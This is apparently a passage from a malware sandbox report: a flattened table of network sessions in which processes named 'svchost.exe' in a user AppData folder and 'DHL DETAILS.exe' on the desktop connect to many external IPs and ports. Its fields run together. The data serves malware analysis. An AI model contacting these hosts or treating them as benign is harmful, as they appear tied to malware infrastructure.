                                                                                    7055192.168.2.5635775.44.42.1155838656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7056192.168.2.54949391.134.140.1602720743080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7057192.168.2.54954291.134.140.1605649543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7058192.168.2.54968791.134.140.160540156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7059192.168.2.54967591.134.140.1603089556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7060192.168.2.549690103.174.102.1278043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7061192.168.2.56271372.217.158.202414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7062192.168.2.54958791.134.140.1603980343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7063192.168.2.549530103.153.246.210808043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7064192.168.2.563637145.239.199.2418056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7065192.168.2.558929128.199.221.913338343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7066192.168.2.56366281.250.223.1268056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7067192.168.2.563171104.248.158.784362056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7068192.168.2.563686123.110.158.2368056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7069192.168.2.563772104.16.108.1498056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7070192.168.2.563784162.159.242.108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7071192.168.2.563798104.27.122.68056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7072192.168.2.550170107.180.90.42106706352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7073192.168.2.563704162.223.91.118056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7074192.168.2.56376568.71.254.6414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7075192.168.2.56380474.48.7.438056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7076192.168.2.56368743.128.146.421567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7077192.168.2.56370391.107.180.2508056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7078192.168.2.56257151.89.173.405151156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7079192.168.2.56329964.227.108.253190856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7080192.168.2.5638013.21.101.158312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7081192.168.2.56371514.103.24.20800056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7082192.168.2.563842104.18.136.288056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7083192.168.2.549662185.104.63.54312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7084192.168.2.56260238.156.73.60808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7085192.168.2.563785185.109.184.1506381956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7086192.168.2.563214115.74.157.191108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7087192.168.2.563996103.133.222.17044356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7088192.168.2.564002103.133.222.17044356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7089192.168.2.564004103.133.222.17044356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7090192.168.2.563927104.20.75.318056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7091192.168.2.563930104.27.37.1318056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7092192.168.2.563936185.162.228.1288056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7093192.168.2.563949104.20.51.998056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7094192.168.2.563937162.159.242.1598056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7095192.168.2.563780138.36.150.16108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7096192.168.2.564008103.133.222.17044356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7097192.168.2.55918892.204.135.372692743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7098192.168.2.56382818.169.83.87108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7099192.168.2.56388720.210.113.328056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7100192.168.2.563822203.89.8.1078056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7101192.168.2.563275104.238.111.107896856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7102192.168.2.56407049.51.93.22244356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7103192.168.2.56408249.51.93.22244356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7104192.168.2.56409349.51.93.22244356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7105192.168.2.56409749.51.93.22244356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7106192.168.2.5638863.122.84.99312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7107192.168.2.56324037.32.98.1603844056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7108192.168.2.56255869.61.200.1043618156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7109192.168.2.563992104.19.171.1888056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7110192.168.2.563875103.154.139.130808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7111192.168.2.56394547.122.45.221312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7112192.168.2.550388162.241.137.197602006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7113192.168.2.563951103.231.78.368056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7114192.168.2.563969203.128.80.178809956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7115192.168.2.563484162.241.53.725569356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7116192.168.2.56321798.175.31.195414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7117192.168.2.5634061.224.3.122388956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7118192.168.2.562788162.241.53.726219256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7119192.168.2.564207172.67.182.1658056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7120192.168.2.564212104.19.247.628056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7121192.168.2.563975202.150.1.878056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7122192.168.2.564079195.154.172.161312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7123192.168.2.564006194.247.173.17808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7124192.168.2.562702189.240.60.166909056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7125192.168.2.56412245.196.150.195543256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7126192.168.2.563747117.160.250.163808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7127192.168.2.55048138.183.135.1899996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7128192.168.2.55047692.204.134.3893756352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7129192.168.2.563227199.58.185.9414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7130192.168.2.56422420.111.54.168056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7131192.168.2.564180130.162.213.175808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7132192.168.2.564219218.252.244.1268043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7133192.168.2.564228123.110.158.2368056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7134192.168.2.551070190.216.234.1869996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7135192.168.2.564185113.140.74.26800056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7136192.168.2.564127122.155.165.191312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7137192.168.2.563874183.234.215.11844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7138192.168.2.551001161.97.173.42539486352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7139192.168.2.56422527.65.240.157108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7140192.168.2.564194123.30.154.171777756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7141192.168.2.564169195.98.74.57108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7142192.168.2.563709192.252.216.81414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7143192.168.2.563653162.214.121.111880956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7144192.168.2.55936345.11.95.166600543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7145192.168.2.56317767.201.59.70414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7146192.168.2.56272636.90.60.255414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7147192.168.2.55931991.134.140.1605151343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7148192.168.2.56423445.61.188.1344449943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7149192.168.2.56423145.61.188.1344449943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7150192.168.2.55952892.204.135.376296943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7151192.168.2.562573104.200.135.46414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7152192.168.2.55158046.226.148.105363666352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7153192.168.2.55197238.41.0.60112016352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7154192.168.2.56423043.128.146.421567343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7155192.168.2.56363094.131.107.45312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7156192.168.2.56290860.188.102.2251808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7157192.168.2.563659138.36.199.14415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7158192.168.2.56424047.122.45.221312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7159192.168.2.56376145.174.87.1899956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7160192.168.2.563763104.238.111.1072839456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7161192.168.2.564247185.162.229.1128056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7162192.168.2.56300068.169.60.220838056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7163192.168.2.564373104.21.80.838056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7164192.168.2.564299185.162.231.2548056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7165192.168.2.564317107.180.103.2144587056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7166192.168.2.551733103.165.234.4680806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7167192.168.2.5644308.219.135.2344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7168192.168.2.563958222.124.135.123567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7169192.168.2.56383791.134.140.1603089556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7170192.168.2.5644488.219.135.2344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7171192.168.2.5644518.219.135.2344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7172192.168.2.5644538.219.135.2344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7173192.168.2.564256194.247.173.17808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7174192.168.2.552749162.214.102.195608916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7175192.168.2.564324140.238.25.2552100043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7176192.168.2.565359157.101.165.368056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7177192.168.2.564284167.71.5.83808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7178192.168.2.564342193.84.89.202844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7179192.168.2.564270122.51.123.2198056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7180192.168.2.55283592.204.134.38425716352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7181192.168.2.559791103.184.56.110808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7182192.168.2.56427191.202.230.219808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7183192.168.2.564016209.142.64.2193978956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7184192.168.2.564446185.162.230.1788056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7185192.168.2.56434642.193.58.96808043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7186192.168.2.56438493.171.220.229888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7187192.168.2.552100107.180.90.248432406352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7188192.168.2.56444167.201.59.70414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7189192.168.2.552842188.166.56.246806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7190192.168.2.56402514.37.251.116312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7191192.168.2.55297537.187.77.5831396352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192192.168.2.564464104.17.9.1148056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7193192.168.2.564470173.245.49.278056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7194192.168.2.56449131.43.179.2148056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
